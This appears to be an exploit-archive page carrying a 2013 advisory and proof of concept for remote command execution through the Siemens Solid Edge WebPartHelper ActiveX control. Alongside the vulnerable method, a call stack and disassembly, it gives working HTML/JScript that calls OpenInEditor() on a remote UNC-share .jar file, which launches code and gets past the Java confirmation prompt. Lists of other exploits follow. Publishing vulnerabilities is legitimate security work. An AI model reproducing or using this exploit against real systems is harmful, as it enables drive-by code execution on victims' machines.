Menu

Search for hundreds of thousands of exploits

"SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution"

Author

Exploit author

rgod

Platform

Exploit platform

windows

Release date

Exploit published date

2013-05-26

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX Control 
RFMSsvs!JShellExecuteEx Remote Command Execution 

Tested against: Microsoft Windows Server 2003 r2 sp2
                Microsoft Windows XP sp3
                Microsoft Windows 7
                Internet Explorer 8

Software description: http://en.wikipedia.org/wiki/Solid_Edge

vendor site: http://www.siemens.com/entry/cc/en/

Download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm

File tested: SolidEdgeV104ENGLISH_32Bit.exe

Background:

The mentioned software installs an ActiveX control with 
the following settings:

CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522}
Progid: SolidEdge.WebPartHelper.1
Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True

This control *implements* IObjectSafety: IE will query through the IObjectSafety
interface for "Safe for Initialization with data" and "Safe For Scripting".

According to IObjectSafety interface, this control is Safe for Scripting 
then IE  will allow scripting of this control according to browser
security settings.

vulnerability:

the WebPartHelper Class offers the OpenInEditor() method, see typelib:

...
  /* DISPID=8 */
function OpenInEditor(
        /* VT_VARIANT [12] [in] */ $URL
        )
{
}
...

By passing an null session share path to the URL argument of this method
is possible to launch an arbitrary executable.

This is because of a ShellExecuteExW() call inside RFMSsvs.dll

Call stack when ShellExecuteExW() is called:

Address    Stack      Procedure / arguments                 Called from                   Frame
01B7E140   04AC9F0E   SHELL32.ShellExecuteExW               RFMSsvs.04AC9F08              01B7F280
01B7F284   022B71AD   ? <jmp.&RFMSsvs.JShellExecuteEx>      WPHelper.022B71A8             01B7F280
01B7F560   022B85B6   WPHelper.022B6D70                     WPHelper.022B85B1             01B7F55C
01B7F5D4   022B87A5   ? WPHelper.022B8380                   WPHelper.022B87A0             01B7F5D0
01B7F620   022B89CB   WPHelper.022B8710                     WPHelper.022B89C6             01B7F61C
01B7F668   7D0E5186   Includes WPHelper.022B89CB            OLEAUT32.7D0E5184             01B7F664
01B7F690   7D0F4ACF   ? OLEAUT32.DispCallFunc               OLEAUT32.7D0F4ACA             01B7F68C
01B7F720   022B58C3   Includes OLEAUT32.7D0F4ACF            WPHelper.022B58C1             01B7F71C
01B7F748   40302C02   Includes WPHelper.022B58C3            jscript.40302BFF              01B7F744
01B7F784   40302B6F   jscript.40302B90                      jscript.40302B6A              01B7F780
01B7F7C0   40302AFA   jscript.40302B2E                      jscript.40302AF5              01B7F7BC
01B7F834   40303555   ? jscript.40302A88                    jscript.40303550              01B7F830
01B7F878   40301221   jscript.4030122A                      jscript.4030121C              01B7F874
01B7F8B8   403011D6   jscript.403011E1                      jscript.403011D1              01B7F8B4
01B7F8DC   4030312D   jscript.40301182                      jscript.40303128              01B7F8D8


WPHelper.dll:
...
022B718A   899D 74FDFFFF    mov dword ptr ss:[ebp-28C],ebx
022B7190   8D85 D8FDFFFF    lea eax,dword ptr ss:[ebp-228]
022B7196   50               push eax
022B7197   8D8D 60FDFFFF    lea ecx,dword ptr ss:[ebp-2A0]
022B719D   51               push ecx
022B719E   C785 7CFDFFFF 01>mov dword ptr ss:[ebp-284],1
022B71A8   E8 ADBB0100      call <jmp.&RFMSsvs.JShellExecuteEx>
...


RFMSsvs.dll:
...
04AC9ECF   8B85 A4EFFFFF    mov eax,dword ptr ss:[ebp-105C]
04AC9ED5   8D8D 4CEFFFFF    lea ecx,dword ptr ss:[ebp-10B4]
04AC9EDB   8946 24          mov dword ptr ds:[esi+24],eax
04AC9EDE   FF15 0CE3CB04    call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>]                    ; JUtil.??BGUserText@@QBEPB_WXZ
04AC9EE4   8946 10          mov dword ptr ds:[esi+10],eax
04AC9EE7   C645 FC 02       mov byte ptr ss:[ebp-4],2
04AC9EEB   8D8D D8EEFFFF    lea ecx,dword ptr ss:[ebp-1128]
04AC9EF1   E8 6A89F1FF      call RFMSsvs.??1JrfmsFileName@@QAE@XZ
04AC9EF6   EB 0F            jmp short RFMSsvs.04AC9F07
04AC9EF8   8D8D 84EFFFFF    lea ecx,dword ptr ss:[ebp-107C]
04AC9EFE   FF15 0CE3CB04    call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>]                    ; JUtil.??BGUserText@@QBEPB_WXZ
04AC9F04   8946 10          mov dword ptr ds:[esi+10],eax        ; eax -> "\\192.168.2.100\uncshare\CmdExec.jar"
04AC9F07   56               push esi
04AC9F08   FF15 E8E6CB04    call dword ptr ds:[<&SHELL32.ShellExecuteExW>]                          ; SHELL32.ShellExecuteExW
...

As attachment, proof of concept code.
Note that by pointing OpenInEditor() (and consequently ShellExecuteExW() ) 
to a remote .jar file as handled in JRE/JDK7u21 is possible to bypass
the usual confirmation box.

<!--
SIEMENS Solid Edge WebPartHelper ActiveX Control RFMSsvs!JShellExecuteEx
Remote Command Execution PoC

CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522}
Progid: SolidEdge.WebPartHelper.1
Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True
-->
<!-- saved from url=(0014)about:internet -->
<html>
<script>

  var obj = new ActiveXObject("SolidEdge.WebPartHelper.1");
   
  //launch calc.exe
  //obj.OpenInEditor("c:\\windows\\system32\\calc.exe");

  //bypass the confirmation box, JRE/JDK7u21
  obj.OpenInEditor("\\\\192.168.0.1\\uncshare\\CmdExec.jar");


</script>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2013-12-11 "EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet Remote Code Execution" remote windows rgod
2013-10-04 "Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object - Remote Code Execution" remote php rgod
2013-05-26 "SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution" dos windows rgod
2013-05-26 "SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution" remote windows rgod
2013-01-07 "Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow (PoC)" dos windows rgod
2012-11-15 "Novell NetIQ Privileged User Manager 2.3.1 - 'ldapagnt.dll' ldapagnt_eval() Perl Code Evaluation Remote Code Execution" remote windows rgod
2012-11-15 "Novell NetIQ Privileged User Manager 2.3.1 - 'auth.dll' pa_modify_accounts() Remote Code Execution" remote windows rgod
2012-08-07 "Oracle Business Transaction Management Server 12.1.0.2.7 - FlashTunnelService WriteToFile Message Remote Code Execution" remote windows rgod
2012-08-07 "Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService - Remote File Deletion" remote windows rgod
2012-08-06 "AOL Products downloadUpdater2 Plugin - 'SRC' Remote Code Execution" dos windows rgod
2012-05-11 "Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow" local windows rgod
2012-04-30 "McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Code Execution" remote windows rgod
2012-04-05 "Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite" remote windows rgod
2012-04-05 "Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite" remote windows rgod
2012-03-28 "D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow" remote hardware rgod
2012-03-28 "TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow" remote hardware rgod
2012-03-28 "Quest InTrust 10.4.x - ReportTree / SimpleTree Classes" remote windows rgod
2012-03-28 "Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution" remote windows rgod
2012-03-22 "Google Talk - 'gtalk://' Deprecated URI Handler Injection" remote windows rgod
2012-03-22 "Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow (PoC)" dos windows rgod
2012-03-19 "LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion" remote windows rgod
2012-03-19 "LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution" remote windows rgod
2012-03-19 "ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Directory Traversal" webapps jsp rgod
2012-03-19 "Dell Webcam Software Bundled - ActiveX Remote Buffer Overflow" remote windows rgod
2012-03-19 "2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite" remote windows rgod
2012-03-19 "2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute" remote windows rgod
2011-11-07 "Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow" remote windows rgod
2011-11-02 "Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution" remote windows rgod
2011-10-31 "Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Buffer Overflow (PoC)" dos windows rgod
2011-10-24 "Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method" remote windows rgod 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected